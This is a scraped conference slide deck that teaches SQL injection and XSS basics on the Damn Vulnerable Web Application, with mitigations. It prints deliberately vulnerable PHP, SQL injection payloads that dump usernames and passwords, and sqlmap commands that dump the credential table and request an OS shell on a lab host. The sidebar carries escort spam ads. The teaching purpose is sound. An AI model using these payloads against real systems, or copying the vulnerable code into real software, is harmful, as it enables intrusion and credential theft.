Wielomilionowy Ruch na Wordpressie - Łukasz Wilczak & Piotr Federowicz (WordC...
 

Recently uploaded

Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsHyundai Motor Group
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 

Recently uploaded (20)

Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 

Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)

  • 1. /GrandParadePoland www.grandparade.co.uk SQL Injection and XSS - Basics with examples on Damn Vulnerable Web Application Paweł Cygal, Senior System Administrator at Grand Parade
  • 2. /GrandParadePoland www.grandparade.co.uk Agenda: - What is SQL Injection? - SQLMAP - What is Cross site scripting ? - example of Session Hijacking
  • 3. /GrandParadePoland www.grandparade.co.uk SQL Injectionl- SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. l- SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
  • 4. /GrandParadePoland www.grandparade.co.uk XSS l- Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications (but now always). XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.
  • 5. /GrandParadePoland www.grandparade.co.uk SQL Injection – what is wrong here? <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { // Get values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; // Increase loop count $i++; } mysql_close(); } ?>
  • 6. /GrandParadePoland www.grandparade.co.uk Answer $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; In this example user can type anything for example: 1' or 1=1 -- Do not trust user input!!!
  • 7. /GrandParadePoland www.grandparade.co.uk examples 1' or 1=1 -- 1' union select 1,2 from users; -- 1' union select version(),user() from users; -- 1' union select user,password from users; -- -1' union select user,password from users; -- -1' union select table_name,2 from information_schema.tables; -- -1' union select column_name,2 from information_schema.columns; -- -1' union select "zaslepka", concat(user,":",password) from users; -- SQLMAP: Current database: sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=4k2qlghmpl74famhq4eejigki0; security=low' --current-db Lis of all databases: sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' --dbs Show tables: sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa --tables Show colums: sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa -T users --columns Show user and pass sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa -T users -C user,password --dump Insert shella: sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' --current-db --os-shell
  • 8. /GrandParadePoland www.grandparade.co.uk Solution - Prepared statements Placeholders - (WHERE a = ? ... WHERE a = :col) prepare execute - Stored procedurs - Escaping special chars mysql_real_escape_string
  • 9. /GrandParadePoland www.grandparade.co.uk /GrandParadePoland www.grandparade.co.uk Cross site scripting – what is wrong here? <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; } ?>
  • 10. /GrandParadePoland www.grandparade.co.uk /GrandParadePoland www.grandparade.co.uk Answer No data validation for user input. User can type whatever he want For example HTML tags or some javascript code. Do not trust user!!!